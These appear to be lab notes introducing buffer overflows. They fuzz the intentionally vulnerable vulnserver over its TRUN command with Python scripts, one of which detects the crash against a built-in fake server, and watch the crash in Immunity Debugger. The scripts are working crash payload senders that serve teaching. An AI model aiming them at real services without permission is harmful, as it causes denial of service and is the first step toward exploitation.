Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debugger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Start the vulnserver program on the Windows host.

2. Connect to vulnserver from Kali Linux (vulnserver listens on port 9999, the port the fuzzer below uses).

nc -nv 10.0.0.XX 9999

3. Write the Python fuzzer script on Kali Linux (fuzzer.py).

#!/usr/bin/python
import socket
import sys

# Build the list of test strings: "A", then 100, 300, 500, ..., 5900 bytes of "A"
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

# Send each string as the argument of vulnserver's TRUN command.
# The last length printed before the connection fails is the one that crashed it.
for string in buffer:
    print "Fuzzing vulnserver with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('10.0.0.XX', 9999))
    s.send('TRUN /.:/' + string)
    s.close()

Make the script executable and run fuzzer.py.

chmod +x fuzzer.py
./fuzzer.py

Vulnserver crashed at 5900 bytes.
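As an added example (not part of the original notes, and not vulnserver's own code), the following Python 3 script implements the same length schedule as the fuzzer above but also detects the crash instead of leaving you to read the last line printed: it reads the greeting, sends the TRUN payload, and waits for a reply, treating a dropped connection or a timeout as the crashing length. The FakeVulnServer class is a constructed stand-in for the real target so the logic can be run offline; the assumptions that the target greets on connect and replies to every TRUN command are labelled in the code.

```python
#!/usr/bin/env python3
"""Python 3 rewrite of the notes' TRUN fuzzer with crash detection.
Added example: FakeVulnServer is a constructed stand-in, not vulnserver."""
import socket
import threading

PREFIX = b"TRUN /.:/"          # vulnserver command prefix used in the notes


def payload_lengths(start=100, step=200, count=30):
    """The notes' schedule: 100, 300, ..., 5900 bytes of filler."""
    return [start + step * i for i in range(count)]


def build_payload(prefix, length, filler=b"A"):
    """Command prefix followed by `length` filler bytes."""
    return prefix + filler * length


def fuzz(host, port, lengths, prefix=PREFIX, timeout=3.0, log=print):
    """Send each payload and wait for the reply.

    Returns the filler length the target apparently died on, or None if
    every payload was answered. Assumption (true for vulnserver): the
    target sends a banner on connect and answers each command.
    """
    previous = None
    for length in lengths:
        log("Fuzzing vulnserver with %d bytes" % length)
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                          # discard the banner
                s.sendall(build_payload(prefix, length))
                reply = s.recv(1024)                  # b"" means the peer closed
        except ConnectionRefusedError:
            log("Target already down; suspect %s bytes" % previous)
            return previous
        except OSError as exc:                        # reset or timeout mid-request
            log("No reply for %d bytes (%s); suspect crash" % (length, exc))
            return length
        if not reply:
            log("Connection dropped after %d bytes; suspect crash" % length)
            return length
        previous = length
    return None


class FakeVulnServer(threading.Thread):
    """Constructed stand-in for vulnserver's TRUN handler: answers every
    request until one reaches `crash_at` bytes, then drops the connection
    and stops listening, like a process that died on an overflow."""

    def __init__(self, crash_at, host="127.0.0.1"):
        super().__init__(daemon=True)
        self.crash_at = crash_at
        self.crashed = False
        self.listener = socket.socket()
        self.listener.bind((host, 0))                 # OS picks a free port
        self.listener.listen(5)
        self.port = self.listener.getsockname()[1]

    def run(self):
        while not self.crashed:
            try:
                conn, _ = self.listener.accept()
            except OSError:
                break
            with conn:
                conn.sendall(b"Welcome to the fake server\n")
                conn.settimeout(2.0)                  # wait for the request to start
                data = b""
                try:
                    chunk = conn.recv(65536)
                    conn.settimeout(0.2)              # short silence = end of request
                    while chunk:
                        data += chunk
                        chunk = conn.recv(65536)
                except socket.timeout:
                    pass
                if len(data) >= self.crash_at:
                    self.crashed = True               # "die": no reply, stop listening
                else:
                    conn.sendall(b"TRUN COMPLETE\n")
        self.listener.close()


if __name__ == "__main__":
    # Offline demo: the stand-in dies at len(PREFIX) + 5900 bytes,
    # reproducing the notes' result of a crash at 5900 bytes.
    server = FakeVulnServer(crash_at=len(PREFIX) + 5900)
    server.start()
    print("Suspect length:", fuzz("127.0.0.1", server.port, payload_lengths()))
```

Against a real target, call fuzz() with the Windows host's address and port 9999; waiting for the reply rather than just sending is what turns "the script stopped printing" into a definite crashing length, and the recv timeout keeps the script from hanging if the dead process leaves the port half-open.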

Immunity Debugger

(Screenshot: Immunity Debugger GUI)

Open vulnserver in Immunity Debugger, or attach the debugger to the running vulnserver process.

Run fuzzer.py from Kali Linux.

./fuzzer.py

Vulnserver finally crashes while running under Immunity Debugger.
